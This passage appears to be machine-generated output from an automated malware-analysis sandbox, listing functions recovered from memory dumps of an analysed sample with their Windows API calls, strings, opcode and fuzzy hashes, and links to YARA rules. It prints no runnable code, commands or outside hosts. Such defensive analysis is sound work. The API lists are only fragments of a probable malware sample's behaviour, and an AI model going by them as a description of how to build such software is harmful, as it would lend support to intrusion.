Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 9f4784d8e256477d4d3a38a48191ab063a539860d5aba2281455f3d0028be6e9
Instruction ID: f00950e12e08d8b7da54efe451c18d1f9eb3ed514ed9d7d04bc26fb8aab35c01
Opcode Fuzzy Hash: 9f4784d8e256477d4d3a38a48191ab063a539860d5aba2281455f3d0028be6e9
Instruction Fuzzy Hash: 26416279600205DFCF14CF59D888EAAB7B5FFA5321F18C2AAD919CB664C730E841CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0088D19C, Relevance: 6.1, APIs: 4, Instructions: 103fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0088D235
GetLastError.KERNEL32(?,00000000), ref: 0088D259
DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0088D279
CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0088D297

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: c78a66cf8780c1f11e13dc70766ac0e11fc867e4b5a7f1870b1c91e289192ae0
Instruction ID: 1e28a7fea72112f6fe7c047279923a9f93370d846e03bae86addff192016f49c
Opcode Fuzzy Hash: c78a66cf8780c1f11e13dc70766ac0e11fc867e4b5a7f1870b1c91e289192ae0
Instruction Fuzzy Hash: FD315AB5900301ABDB10FFA9D989A5AB7A8FF85310F148959F844E7342CB75FD41CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00880311, Relevance: 6.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0088033E
DefDlgProcW.USER32(?,00000138,?,?), ref: 0088038D
DefDlgProcW.USER32(?,00000133,?,?), ref: 008803DC
DefDlgProcW.USER32(?,00000134,?,?), ref: 0088040D

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: Proc$Parent
String ID:
API String ID: 2351499541-0
Opcode ID: 18bf224798ac0f363788d229732569458d8c0b31da458eeb857081d6c53ad001
Instruction ID: 823b84e90c93dd2d1304de90acb84848e4893e626117079b9325ccf6acee5921
Opcode Fuzzy Hash: 18bf224798ac0f363788d229732569458d8c0b31da458eeb857081d6c53ad001
Instruction Fuzzy Hash: 12318F36200104AFDA60AF69EC98DAB7718FF95335B148716F569CB3D2CB71980ACB60

Uniqueness

Uniqueness Score: -1.00%

Function 008793FE, Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00860593: _wcspbrk.LIBCMT ref: 008605A3

SendMessageW.USER32(?,00001002,00000000,?), ref: 008793D0
SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00879460
_wcslen.LIBCMT ref: 00879472
_wcslen.LIBCMT ref: 0087947F

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend_wcslen$_wcspbrk
String ID:
API String ID: 2886238975-0
Opcode ID: 99ab8dae512b415af44e01a21f6a468f08b98ad110010ccc45fbc917762905ac
Instruction ID: 8d203e45500b2ef7fbc720eace798df3a143e4a7c1f107cd67dbafb09773be28
Opcode Fuzzy Hash: 99ab8dae512b415af44e01a21f6a468f08b98ad110010ccc45fbc917762905ac
Instruction Fuzzy Hash: C3214C7660020896DB30DF99EC85BEEB368FBA0310F10826AFE0CD6185D7718995C791

Uniqueness

Uniqueness Score: -1.00%

Function 008A4345, Relevance: 6.1, APIs: 4, Instructions: 83COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 008A4356

Part of subcall function 008738C5: GetWindowThreadProcessId.USER32(?,00000000), ref: 008738E8
Part of subcall function 008738C5: GetCurrentThreadId.KERNEL32 ref: 008738EF
Part of subcall function 008738C5: AttachThreadInput.USER32(00000000), ref: 008738F6

GetCaretPos.USER32(?), ref: 008A436C
ClientToScreen.USER32 ref: 008A43A2
GetForegroundWindow.USER32 ref: 008A43A8

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 603acc12d3dde7393cafd87d21dab39afca00a40d88a4d7d609eafb30f414bcb
Instruction ID: 45619bb6dc311a4613309db56994a61a0deea1b17c3fd8af438ae501c1c985bf
Opcode Fuzzy Hash: 603acc12d3dde7393cafd87d21dab39afca00a40d88a4d7d609eafb30f414bcb
Instruction Fuzzy Hash: 8F219771E00309ABDB10EFA8CC86F9EB7A9FF84300F144555F545EB282D6F5A9408BD2

Uniqueness

Uniqueness Score: -1.00%

Function 008AA224, Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

Part of subcall function 0089F356: IsWindow.USER32(00000000), ref: 0089F386

GetWindowLongW.USER32 ref: 008AA299
SetWindowLongW.USER32 ref: 008AA2B4
SetWindowLongW.USER32 ref: 008AA2CC
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 008AA2DB

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: ce7c405a12791ccec2bf17391747bf812f2bab03ba0e6c2686784c4921d1f42b
Instruction ID: e9bbc3b3201e2a7c684e856d509a31fed2aaa1e8920c2833c0c021be13eef313
Opcode Fuzzy Hash: ce7c405a12791ccec2bf17391747bf812f2bab03ba0e6c2686784c4921d1f42b
Instruction Fuzzy Hash: A521DF32205514AFE720AB28EC45F9BB798FF82330F244325F815E76A1C765AC51C7E9

Uniqueness

Uniqueness Score: -1.00%

Function 00860165, Relevance: 6.1, APIs: 4, Instructions: 57windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32 ref: 008601AF
GetStockObject.GDI32(00000011), ref: 008601C5
SendMessageW.USER32(00000000,00000030,00000000), ref: 008601CF
ShowWindow.USER32(00000000,00000000), ref: 008601EA

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CreateMessageObjectSendShowStock
String ID:
API String ID: 1358664141-0
Opcode ID: 25a81b37329c9926f9d6a11c0fa52cf5594016c8e47277f19df68033263a864a
Instruction ID: aa37d9d1a9f35d975009943c125380cceffb384506afd29743e312140d7d4e29
Opcode Fuzzy Hash: 25a81b37329c9926f9d6a11c0fa52cf5594016c8e47277f19df68033263a864a
Instruction Fuzzy Hash: BC111872200505ABDB15CE99DC49FDBB7A9FF99B10F158309FA18932A0D774E8418BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00877215, Relevance: 6.0, APIs: 4, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 008770BF: DeleteObject.GDI32(00000000), ref: 008770FC
Part of subcall function 008770BF: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 0087713C
Part of subcall function 008770BF: SelectObject.GDI32(?,00000000), ref: 0087714C
Part of subcall function 008770BF: BeginPath.GDI32(?), ref: 00877161
Part of subcall function 008770BF: SelectObject.GDI32(?,00000000), ref: 0087718A

MoveToEx.GDI32(?,?,?,00000000), ref: 0087723B
LineTo.GDI32(?,?,?), ref: 0087724A
EndPath.GDI32(?), ref: 0087725A
StrokePath.GDI32(?), ref: 00877268

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
String ID:
API String ID: 2783949968-0
Opcode ID: b868d5e5166a0ab4d47f3fa9fe31add0bc914aa683a8d5ac8851dfa94986d973
Instruction ID: 7cb629c544bade992daee358a63897a879049099acc9f212052df6f1c6f66682
Opcode Fuzzy Hash: b868d5e5166a0ab4d47f3fa9fe31add0bc914aa683a8d5ac8851dfa94986d973
Instruction Fuzzy Hash: F1F01D71115658BBE711AF18AC09FAA3B5DFB06321F108201FD11A62D2C774A941CBB5

Uniqueness

Uniqueness Score: -1.00%

Function 00866406, Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32 ref: 00866425
GetWindowThreadProcessId.USER32(?,00000000), ref: 00866438
GetCurrentThreadId.KERNEL32 ref: 0086643F
AttachThreadInput.USER32(00000000), ref: 00866446

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: e75f541bb0e14a31e5b4e5f60fe27e2c4c235f695f5425a1dae72af69d3b4800
Instruction ID: 0b3baa7de2cb190e36791556d342de0242c54ab44ada23b7efb8e97599d432c6
Opcode Fuzzy Hash: e75f541bb0e14a31e5b4e5f60fe27e2c4c235f695f5425a1dae72af69d3b4800
Instruction Fuzzy Hash: 57F06D7128034876EB216BA19C0EFDA375CFB15B11F508201B700F90C0EAB4A51087A9

Uniqueness

Uniqueness Score: -1.00%

Function 0084506D, Relevance: 6.0, APIs: 4, Instructions: 16threadCOMMON

Download Yara Rule

APIs

__getptd_noexit.LIBCMT ref: 00845070

Part of subcall function 00847913: GetLastError.KERNEL32(00000003,?,00847994,?,00841259,?,?,008412DC,?,00000001), ref: 00847917
Part of subcall function 00847913: ___set_flsgetvalue.LIBCMT ref: 00847925
Part of subcall function 00847913: __calloc_crt.LIBCMT ref: 00847939
Part of subcall function 00847913: GetCurrentThreadId.KERNEL32 ref: 00847969
Part of subcall function 00847913: SetLastError.KERNEL32(00000000,?,008412DC,?,00000001), ref: 00847981

CloseHandle.KERNEL32(?,?,008450BB), ref: 00845084
__freeptd.LIBCMT ref: 0084508B
ExitThread.KERNEL32 ref: 00845093

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
String ID:
API String ID: 1454798553-0
Opcode ID: 473f5dbeee900c7fde2ce652ccfc82a5f36dfa5e78d8867310806c0708ce866d
Instruction ID: a3472507977f1760360199f0190fc31bb6683993eba5168b6fb3b06e2ff2a0f5
Opcode Fuzzy Hash: 473f5dbeee900c7fde2ce652ccfc82a5f36dfa5e78d8867310806c0708ce866d
Instruction Fuzzy Hash: 22D0A932805E241BC2316378880DB0E2BA6FF40B31B180B00F465DB2E2CB28CE4286E2

Uniqueness

Uniqueness Score: -1.00%

Function 0085F2DF, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 370COMMON

Download Yara Rule

APIs

_strncmp.LIBCMT ref: 0085F4BD

Strings

Q\E, xrefs: 0085F4B7

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: _strncmp
String ID: Q\E
API String ID: 909875538-2189900498
Opcode ID: 6fefb6e543302578eae4b0b15911753eeedca05c5766e63f75a8df7cc7013477
Instruction ID: c0cb8f66c1862487b2aab104c64b523b4a378fa6dfdc86dacb444e428610e979
Opcode Fuzzy Hash: 6fefb6e543302578eae4b0b15911753eeedca05c5766e63f75a8df7cc7013477
Instruction Fuzzy Hash: A5C1BD709052599BDF318F1880503AABBE6FF1A316F6441BADED4D7246D3709E8A8B81

Uniqueness

Uniqueness Score: -1.00%

Function 0087F36A, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 185COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0087CF87
_strncmp.LIBCMT ref: 0087F9B9

Strings

U, xrefs: 0087FAFE
\, xrefs: 0087CFD7

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: _memmove_strncmp
String ID: U$\
API String ID: 2666721431-100911408
Opcode ID: 0eb57f72225b823ddca2d089180a6afb0b18e5400349479a4c032d7bb747bc97
Instruction ID: 3b14cc45be527aab1bc89da2274b7bf468897249e1989ffb568e1dd3f7d63c1e
Opcode Fuzzy Hash: 0eb57f72225b823ddca2d089180a6afb0b18e5400349479a4c032d7bb747bc97
Instruction Fuzzy Hash: 5E716A70A002498FCF24CF69C9906AEFBF2FF99304F24826DD55AE7249D7709945CB11

Uniqueness

Uniqueness Score: -1.00%

Function 00896362, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 181shareCOMMON

Download Yara Rule

APIs

Part of subcall function 0083F260: _wcslen.LIBCMT ref: 0083F262
Part of subcall function 0083F260: _wcscpy.LIBCMT ref: 0083F282

__wcsnicmp.LIBCMT ref: 008963D5
WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0089647B

Strings

LPT, xrefs: 008963CF

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: Connection__wcsnicmp_wcscpy_wcslen
String ID: LPT
API String ID: 3035604524-1350329615
Opcode ID: 656f437583fddf772cc72a17bc3e565cae1eaeae1d0961b914a9b31e126d538e
Instruction ID: 1676d34e312d99d61b2e7334c7ccc98f5fa21d36003bcde52d63a633841d4ac9
Opcode Fuzzy Hash: 656f437583fddf772cc72a17bc3e565cae1eaeae1d0961b914a9b31e126d538e
Instruction Fuzzy Hash: F3516DB5A00208ABDF20EFA8C885FAEB7B5FB84700F158559F506DB241E774EE45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0087D34B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0087D0BA

Strings

\, xrefs: 0087CFD7

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: _memmove
String ID: \
API String ID: 4104443479-2967466578
Opcode ID: 7d45c08e01fa7e59e557f8fc50fc37862dd91f04bdebfe81c07ca81faf8fbc07
Instruction ID: 9c94a473b8c97a93899301af480fd490cee68bdb5256fb89d1b0f56bab383019
Opcode Fuzzy Hash: 7d45c08e01fa7e59e557f8fc50fc37862dd91f04bdebfe81c07ca81faf8fbc07
Instruction Fuzzy Hash: CF51C170E006498FCF25CFA9C8802ADBBB2FF95310F24826ED459E7289D7319D42CB41

Uniqueness

Uniqueness Score: -1.00%

Function 008782B3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 0087839F
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 008783B8

Strings

', xrefs: 00878312

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 5dae4c32c579691f65db5c6f375379bc1cc8172d69795e0935a4f5dda9a77ca4
Instruction ID: 1925edcc7a031d5d35e01218e926d8306d18b0e618dab1ac07cf15777a531ce8
Opcode Fuzzy Hash: 5dae4c32c579691f65db5c6f375379bc1cc8172d69795e0935a4f5dda9a77ca4
Instruction Fuzzy Hash: 2B414A75A00209DFCB04CF5CD888AEEB7B5FB59710F14816AE909EB349DB70A941CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0083F540, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 0083F548

Part of subcall function 0083F570: _memmove.LIBCMT ref: 0083F5B9

Part of subcall function 0083F570: _memmove.LIBCMT ref: 0083F5D3

_sprintf.LIBCMT ref: 0083F69E

Strings

%02X, xrefs: 0083F698

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: _memmove$_sprintf_strlen
String ID: %02X
API String ID: 1921645428-436463671
Opcode ID: d1c945900daaf1f4c057a79912cabc4eaa8a2ba5c751dbfc2e2380f1b6bffd92
Instruction ID: eac7d18d82c732d01f409482505f5c26054c21af870af44cb0ace2468d9f91ae
Opcode Fuzzy Hash: d1c945900daaf1f4c057a79912cabc4eaa8a2ba5c751dbfc2e2380f1b6bffd92
Instruction Fuzzy Hash: 7321C272B0021876D714A66C8C83BABB39CFF91700F54407AF601D7293EA64FA1982E6

Uniqueness

Uniqueness Score: -1.00%

Function 00881297, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 008812C0
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 008812D0

Strings

edit, xrefs: 00881338

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 44a817902f3317bc1e952d8cdc09e58ac9c95eb7e0016a4dbf09e5eed38b5996
Instruction ID: caebe1c36e6922ab1e24ef0ecb7d0ff618e5dee705795afd979ca09e9b3d1dc8
Opcode Fuzzy Hash: 44a817902f3317bc1e952d8cdc09e58ac9c95eb7e0016a4dbf09e5eed38b5996
Instruction Fuzzy Hash: FE215171610204ABDF20DEA8D884EEB33ADFB99334F104315F964D72D0C674DC818B60

Uniqueness

Uniqueness Score: -1.00%

Function 008724F3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0087257F

Strings

<local>, xrefs: 0087253E

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: InternetOpen
String ID: <local>
API String ID: 2038078732-4266983199
Opcode ID: c3f0871c4460e822515382201f8b768e0b4cad77f8da4d1f4f73f617fbf0f43e
Instruction ID: a059deb2338c7c6ec6daa16f1e5ea0d8db0e13c33994889a8edf4bd4b974a4f3
Opcode Fuzzy Hash: c3f0871c4460e822515382201f8b768e0b4cad77f8da4d1f4f73f617fbf0f43e
Instruction Fuzzy Hash: F811C270680314ABE774CA548C66FBAB3A8FB11B04F20C10AF94AEB6C4D6B0F944D751

Uniqueness

Uniqueness Score: -1.00%

Function 0089907F, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00831D10: _wcslen.LIBCMT ref: 00831D11
Part of subcall function 00831D10: _memmove.LIBCMT ref: 00831D57

SendMessageW.USER32(00000000,00000180,00000000,00000000), ref: 008990EB

Strings

ComboBox, xrefs: 0089908B
ListBox, xrefs: 008990B6

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
